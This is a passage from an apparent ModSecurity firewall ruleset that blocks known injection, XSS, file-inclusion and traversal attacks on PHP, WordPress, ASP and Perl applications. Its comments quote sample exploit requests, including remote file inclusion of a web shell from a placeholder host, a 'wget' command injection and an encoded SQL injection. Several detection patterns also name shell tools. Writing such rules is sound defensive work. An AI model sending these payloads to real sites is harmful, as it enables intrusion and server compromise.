SecRule REQUEST_URI "/(?:showrecords|help_(?:browse|prefs|register))\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390571,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Owl SQL injection attack',logdata:'%{TX.0}'"
SecRule ARGS:sess|ARGS:type|ARGS:expand "(\%|-|;|\)|\(|/|'|=|\*|#|\")"
#e107 PHP code injection
SecRule ARGS:author_name "(?:\[ ?php ?\]|< ?\?)" "id:390757,rev:2,severity:1,t:none,t:htmlEntityDecode,t:urlDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: e107 PHP code injection vulnerability',logdata:'%{TX.0}'"
#Sulata iSoft (stream.php) Local File Disclosure Exploit
SecRule REQUEST_URI "/stream\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390758,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sulata iSoft Local File Disclosure Exploit',logdata:'%{TX.0}'"
SecRule ARGS:path "\.\."
#Honeypot
#products.php?homeinclude='
SecRule REQUEST_URI "/products\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390759,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL Injection Exploit',logdata:'%{TX.0}'"
SecRule ARGS:homeinclude "\'"
#Oscommerce
SecRule REQUEST_URI "(?:/admin/.*\.php/(?:login|application_top)|/m32)\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390756,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oscommerce Exploit',logdata:'%{TX.0}'"
#zencart sql injection
SecRule REQUEST_URI "\.php/password_forgotten\.php" "log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:320757,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ZenCart Sql Injection Exploit',logdata:'%{TX.0}'"
#XSS JITPs
SecRule ARGS "@pm < > script onevent script about applet activex chrome" "id:333869,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309004,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_XSS"
SecRule REQUEST_FILENAME "admin-mail-info\.php" "phase:2,id:322100,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: admin-mail-info.php XSS attack (CVE-2016-1000146)',severity:2,chain"
SecRule ARGS:itemid "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode"
SecRule REQUEST_FILENAME "ultimate-instagram-feed\.php" "phase:2,id:322101,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ultimate-instagram-feed.php XSS attack (CVE-2017-16758)',severity:2,chain"
SecRule ARGS:access_token "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode"
# Rule 310349:exoops Input Validation Flaws SQL injection and XSS
SecRule ARGS:viewcat "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:310349,rev:1,deny,status:403,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops index.php cross-site-scripting attempt',log,auditlog"
# Rule 310324: phpSysInfo XSS vulns
SecRule ARGS:sensor_program "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,id:310324,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo index.php cross-site-scripting attempt',log,auditlog"
# Rule 310386: CPG Dragonfly XSS
#SecRule REQUEST_URI "/index\.php\?name=.*\&(?:file|mode)=.*\&(?:meta|id)=.*\">.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310386,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CPG Dragonfly index.php cross-site-scripting attempt'"
# Rule 310389: CPG Dragonfly XSS
#SecRule REQUEST_URI "/index\.php\?name=.*&profile=.*\">.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310389,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CPG Dragonfly index.php cross-site-scripting attempt'"
# Rule 310422:PinnacleCart XSS Attack
#SecRule REQUEST_URI "/index\.php\?p=catalog&parent=.*&pg=\">" # "id:310422,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PinnacleCart index.php cross-site-scripting attempt'"
# Rule 310433: EasyPHPCalendar XSS
#SecRule REQUEST_URI "/index\.php\?mo=.*&yr=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310433,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyPHPCalendar index.php cross-site-scripting attempt'"
# Rule 310452:Coppermine Photo Gallery Multiple XSS
#SecRule REQUEST_URI "/index\.php\?lang=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310452,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine index.php cross-site-scripting attempt'"
#billing system
#SecRule REQUEST_URI "/billing/index.php" # "log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,chain,id:390642,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Billing system XSS attack'"
#SecRule ARGS "(<|>)"
#contact form XSS
SecRule REQUEST_URI "/contact\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,chain,id:390643,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Contact form XSS attack'"
SecRule ARGS:comments|ARGS:name|ARGS:domain_name|ARGS:email_address|ARGS:phone|ARGS:department|ARGS:subject|ARGS:security_code "(<|>)"
#Horde command shell XSS attack
SecRule REQUEST_URI "admin/(?:cmd|sql|php)shell\.php/\">" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:390648,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde command shell XSS attack'"
#comments= contactus XSS
SecRule REQUEST_URI "/contactus\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:393651,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible XSS injection in contactus application comments'"
SecRule ARGS:comments|ARGS:username|ARGS:email|ARGS:name|ARGS:orgname|ARGS:phone|ARGS:address "(?:<|>|script)"
#Another remarkably vulnerable app
#/members/index.php
SecRule REQUEST_URI "(?:/members/index|signup)\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:366000,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
SecRule ARGS:username|ARGS:address|ARGS:email|ARGS:name|ARGS:orgname|ARGS:phone|ARGS:password|ARGS:expand|ARGS:comments "< ?script"
#knowledgebase vulns
SecRule REQUEST_FILENAME "/knowledgebase\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:366001,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
SecRule ARGS "(?:<|>|script|^\')"
SecRule REQUEST_FILENAME "/knowledgebase\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:366002,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
SecRule ARGS:search "(?:onevent|<|>|script)"
#XSS in Sodahead Polls wordpress plugin
SecRule REQUEST_FILENAME "/poll\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380201,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS exploit in Sodahead Polls wordpress plugin',logdata:'%{TX.0}'"
SecRule ARGS:customize "(<|>)"
#XSS in Rating-Widget wordpress plugin
SecRule REQUEST_FILENAME "/save\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS exploit in Rating-Widget wordpress plugin',logdata:'%{TX.0}'"
SecRule ARGS:rw_form_hidden_field_name "(<|>)"
SecMarker END_PHP_JITP_XSS
SecRule REQUEST_URI "(?:(?:tim|php)thumb|thumb|_tbs|dbase|thumb|thumbopen|/themify/img)\.php" "id:333870,rev:2,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309005,t:none,pass,nolog,noauditlog,skipAfter:END_TIMTHUMB"
#
SecRule ARGS:/fltr/ "\;" "log,deny,log,auditlog,t:none,t:urlDecodeUni,capture,id:380215,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Command Injection Attempt',logdata:'%{TX.0}'"
SecRule ARGS:src "\$" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381214,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Command Injection Attempt',logdata:'%{TX.0}'"
SecRule ARGS:src "@beginsWith http://%{SERVER_NAME}/" "id:333871,pass,nolog,noauditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,rev:3,skipAfter:END_TIMTHUMB"
SecRule ARGS:src "(?:(?:ht|f)tps?://(.*|)(?:(?:flickr|picasa|wordpress|img.youtube|photobucket|blogger)\.com\.|upload\.wikimedia\.org\.)|^/[a-z][0-9]+\.\./[a-z0-9]+\.(?:gif|jpg|png))" "log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381202,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Remote Code Execution Vulnerability Exploit attempt',logdata:'%{TX.0}'"
SecRule ARGS:src "!(?:\.(jpe?g|gif|png|bmp|pdf|mp(:?3|e?g))(?:$|\?(?:w|h|fit|o(?:h|e)|resize)=)|^(?:\.\./|/|multifeed)|^$|^[0-9a-z]+/)" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381203,rev:12,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Non Image Upload Attempt',logdata:'%{TX.0}'"
SecMarker END_TIMTHUMB
SecRule REQUEST_URI "/(?:ibrowser|scripts/(?:loadmsg|rfiles|symbols))\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381204,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: iBrowser Plugin Probe',logdata:'%{TX.0}'"
SecRule ARGS:lang "test"
SecRule REQUEST_URI "/extras/curltest\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381205,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Curltest Probe',logdata:'%{TX.0}'"
#dbase.php?action='
SecRule REQUEST_URI "/dbase\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381215,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dbase SQL injection attack',logdata:'%{TX.0}'"
SecRule ARGS:action "'" "t:none,t:urlDecodeUni"
#Wordpress JITPs
SecRule REQUEST_FILENAME|ARGS|!ARGS:message|!ARGS:post|!ARGS:/wpTextbox/ "wp-config\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381206,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access to WordPress configuration file blocked',logdata:'%{TX.0}'"
SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "id:333872,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309006,t:none,pass,nolog,noauditlog,skipAfter:END_WP_SETUP"
#SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381207',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress remote IP address for Database Denied.',logdata:'%{matched_var}',tag:'CVE-2011-4899'"
#SecRule ARGS_GET:step "@streq 2" "chain"
#SecRule ARGS_POST:dbhost "^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$" "chain"
#SecRule MATCHED_VAR "!@streq %{server_addr}"
#SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381208',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress remote IP address for Database Denied.',logdata:'%{matched_var}',tag:'CVE-2011-4899'"
#SecRule ARGS_GET:step "@streq 2" "chain"
#SecRule ARGS_POST:dbhost ".*" "chain"
#SecRule MATCHED_VAR "!^(?:%{server_name}|localhost|127\.0\.0\.1)$"
SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381209',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Request is missing required parameters.',tag:'CVE-2011-4898'"
SecRule ARGS_GET:step "@streq 2" "chain"
SecRule &ARGS_POST:dbhost|&ARGS_POST:dbname|&ARGS_POST:uname|&ARGS_POST:pwd|&ARGS_POST:prefix|&ARGS_POST:submit "!@eq 1"
SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381210',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Multiple Cross Site Scripting Vulnerabilities in \'setup-config.php\' page',logdata:'%{matched_var}',tag:'CVE-2012-0782'"
SecRule ARGS_GET:step "@streq 2" "chain"
SecRule ARGS_POST:dbhost|ARGS_POST:dbname|ARGS_POST:uname "@pm < > \" ( ) = ;" "ctl:auditLogParts=+E,multiMatch,t:none,t:htmlEntityDecode,t:jsDecode,t:cssDecode"
SecMarker END_WP_SETUP
#/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php
SecRule REQUEST_FILENAME "/wp-content/plugins/1-flash-gallery/upload\.php" "t:none,t:urlDecodeUni,t:lowercase,chain,id:311291,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: 1 Flash Gallery Wordpress Plugin File Upload Exploit'"
SecRule ARGS:fileext "(?:php|pl|cgi|sh|py)"
#SecRule ARGS:abspath
SecRule ARGS:abspath "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase,id:311292,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: abspath RFI Exploit'"
#/pma/scripts/setup.php
#action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:55:"http://www.example.com/malicious_payload.php";}}
SecRule REQUEST_URI "/scripts/setup\.php" "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpMyAdmin setup.php RFI Exploit'"
SecRule ARGS:configuration "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase"
#config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt
SecRule REQUEST_URI "/config_db\.inc\.php" "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311294,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution attack blocked'"
SecRule ARGS:2 "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase"
#honeypot hits
#/include/scripts/export_batch.inc.php?DIR=test??
#/forgot_password.php?inc_dir=test
#/web.php?id='
#/songinfo.php?commonpath=test??
#search.php?catid='
#/backupmgt/localJob.php?session=fail;cd+/tmp;wget
SecRule REQUEST_URI "/localjob\.php" "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311235,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: localjob.php Remote Code Execution attack blocked'"
SecRule ARGS:session "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\;)" "t:none,t:urlDecodeUni,t:lowercase"
SecMarker END_PHP_JITP
#/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
#
SecRule REQUEST_URI "/user/register" "chain,phase:2,id:322194,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal remote command execution blocked',severity:2"
SecRule ARGS:form_id "user_register_form" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:/post_render/ "exec" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:/mail/ "(?:\||wget|curl|\;|-|sh)" "t:none,t:urlDecodeUni,t:lowercase"
#wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520SELECT%2525201%25252Cuser_login%252520FROM%252520xayzj_users%252523
SecRule REQUEST_URI "wp-json/wc/store/products/collection-data" "chain,phase:2,id:322193,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Woocommerce SQLi blocked',severity:2"
SecRule ARGS:/calculate_attribute_counts/ "(?:union|\%2522)" "t:none,t:removeCommentsChar,t:removeWhiteSpace,t:lowercase,multimatch"
SecRule REQUEST_FILENAME "/nexos-wp/top-map/" "chain,phase:2,id:322192,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress nexos theme XSS attack (CVE 2020-15364)',severity:2"
SecRule &ARGS:search_order "@gt 0" "chain,t:none"
SecRule ARGS:search_location "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule ARGS:deliverypostcode|ARGS:invoicepostcode|ARGS:postcode "(?:<[[:space:]]*(?:script|about|applet|activex|chrome)|\bon(?:abort|blur|change|click|event|submit|dragdrop|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b ?= ?(\"|\')? ?\w|>( |\+)?<( |\+)?img( |\+)?src( |\+)?=( |\+)?(ht|f)tps?:/)" "phase:2,deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,id:311295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cross site scripting attack blocked'"
#username= > &password=%0a
SecRule ARGS:username ">" "phase:2,chain,capture,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,capture,id:336463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: antMan <= 0.9.0c Authentication Bypass attack blocked',logdata:'%{TX.0}'"
SecRule ARGS:password "\%0a" "t:none,chain"
SecRule REQUEST_METHOD "(?:POST|GET)" "t:none"
#WP config file protection
SecRule REQUEST_URI "(?:^/?[a-z0-9/]{0,}wp-login\.php\?vaultpress=|^/smb/file-manager/)" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:372473,skipAfter:END_RULE_336461"
SecRule REQUEST_FILENAME "\.cgi$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:377475,skipAfter:END_RULE_336461"
#../wp-config.php
SecRule ARGS|!ARGS:/wp_autosave/|!ARGS:subject|!ARGS:/msg/|!ARGS:/messages/|!ARGS:/chg_file/|!ARGS:/aiowps/ "^/?[a-z0-9\./]{0,}wp-config\.php" "phase:2,chain,capture,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336461,rev:8,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible attempt to maliciously access wp-config.php file',logdata:'%{TX.0}'"
SecRule REQUEST_METHOD "(?:POST|GET)" "t:none"
SecMarker END_RULE_336461
SecRule REQUEST_URI_RAW "^\w+:/" "chain,phase:2,deny,log,auditlog,status:403,t:none,id:314293,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Proxy Probe'"
SecRule REQUEST_URI "/(?:(?:proxyheader|proxy-?1?|proxy/judge)\.php|fastenv|proxy(?:judge|proxy))" "t:none,t:urlDecodeUni,t:lowercase"
#ECP proxy
SecRule REQUEST_FILENAME "@endswith .ecp" "id:330883,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:330884,t:none,pass,nolog,noauditlog,skipAfter:END_ECP_JITP"
SecMarker END_ECP_JITP
#ASP applications
SecRule REQUEST_FILENAME "@endswith .(?:aspx?|svc)" "id:313873,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:313874,t:none,pass,nolog,noauditlog,skipAfter:END_ASL_JITP"
#CMD=Set-OabVirtualDirectory
SecRule ARGS|REQUEST_COOKIES "set-oabvirtualdirectory" "id:317092,rev:12,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Exchange server zero day blocked'"
SecRule REQUEST_URI "/search\.aspx" "id:317091,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: search XSS attempt',chain"
SecRule ARGS "^><"
# Rule 310091: Crystal Reports crystalImageHandler.aspx directory
# traversal attempt
SecRule REQUEST_URI "/crystalimagehandler\.aspx" "id:310091,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Crystal Reports crystalImageHandler.aspx directory traversal attempt',chain"
SecRule ARGS:dynamicimage "\.\./"
# Rule 310210: philboard_admin.asp authentication bypass attempt
SecRule REQUEST_URI "/philboard_admin\.asp" "id:310210,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: philboard_admin.asp authentication bypass attempt',chain"
SecRule ARGS:philboard_admin "true"
# Rule 310296: ACS Blog search.ASP Cross-Site Scripting Vulnerability
SecRule REQUEST_URI "/search\.asp" "chain,id:310296,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ACS Blog search.asp cross-site-scripting attempt'"
SecRule ARGS:search "(?:(?:javascript|script|about|applet|activex|chrome)*\>|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)\:/\\:/)"
# Rule 310300: OWA phishing redirect
SecRule REQUEST_URI "/exchweb/bin/auth/owalogon\.asp" "chain,id:310300,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Outlook Web Access owalogon.asp phishing redirect attempt'"
SecRule ARGS:url "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310367:PortalApp SQL injection and XSS
SecRule REQUEST_URI "/ad_click\.asp" "chain,id:310367,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PortalAPP ad_click.asp SQL injection attempt'"
SecRule ARGS:banner_id "'"
# Rule 310368:PortalApp SQL injection and XSS
SecRule REQUEST_URI "/content\.asp" "chain,id:310368,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PortalAPP content.asp SQL injection attempt'"
SecRule ARGS:catid|ARGS:contentid "'"
# Rule 310370:PortalApp SQL injection and XSS
SecRule REQUEST_URI "/content\.asp" "chain,id:310370,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PortalAPP content.asp cross-site-scripting attempt'"
SecRule ARGS:contenttype|ARGS:do_search "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310475:SQL Injections in MetaBid auctions
SecRule REQUEST_URI "/item\.asp" "chain,id:310475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MetaBid item.asp SQL injection attempt'"
SecRule ARGS:intauctionid "'"
#RedDot CMS SQL injection vulnerability
SecRule REQUEST_URI "iord\.asp" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390180,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RedDot CMS SQL injection vulnerability'"
SecRule ARGS:action "(?:io_dgc_eng|xtype=char|sysobjects|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
#links.asp Catid injection
SecRule REQUEST_URI "/links\.asp" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:390196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: links.asp SQL injection vulnerability'"
SecRule ARGS:catid "(?:password|user_name|accesslevel)"
SecMarker END_ASL_JITP
#PERL applications
SecRule REQUEST_FILENAME "@endswith .pl" "id:333874,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309008,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_JITP"
# Rule 310000: formmail
SecRule REQUEST_URI "/(?:formmail|mailform)(?:\x0a|\.pl\x0a)" "id:310000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: web-cgi formmail'"
# Rule 310051: *%0a.pl access
SecRule REQUEST_URI "/*\x0a\.pl" "id:310051,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: a.pl access'"
# Rule 310089:awstats probe
SecRule REQUEST_URI "^/awstats\.pl$" "id:310089,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Awstats.pl probe'"
# Rule 310093:ftp.pl attempt
SecRule REQUEST_URI "/ftp\.pl\?dir=\.\./\.\." "id:310093,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ftp.pl directory traversal attempt'"
# Rule 310100: anaconda directory transversal attempt
SecRule REQUEST_URI "/(?:apexec|anacondaclip)\.pl" "id:310100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: anaconda directory transversal attempt', chain"
SecRule REQUEST_URI "template=\.\./"
# Rule 310104: rwwwshell.pl access
SecRule REQUEST_URI "/rwwwshell\.pl" "id:310104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: rwwwshell.pl access'"
# Rule 310106: calendar_admin.pl arbitrary command execution attempt
SecRule REQUEST_URI "/calendar_admin.pl\?config=\|7c\|" "id:310106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: calendar_admin.pl arbitrary command execution attempt'"
# Rule 310111: Amaya templates sendtemp.pl directory traversal attempt
SecRule REQUEST_URI "/sendtemp\.pl" "id:310111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Amaya templates sendtemp.pl directory traversal attempt',chain"
SecRule REQUEST_URI "templ="
# Rule 310114: cgiforum.pl attempt
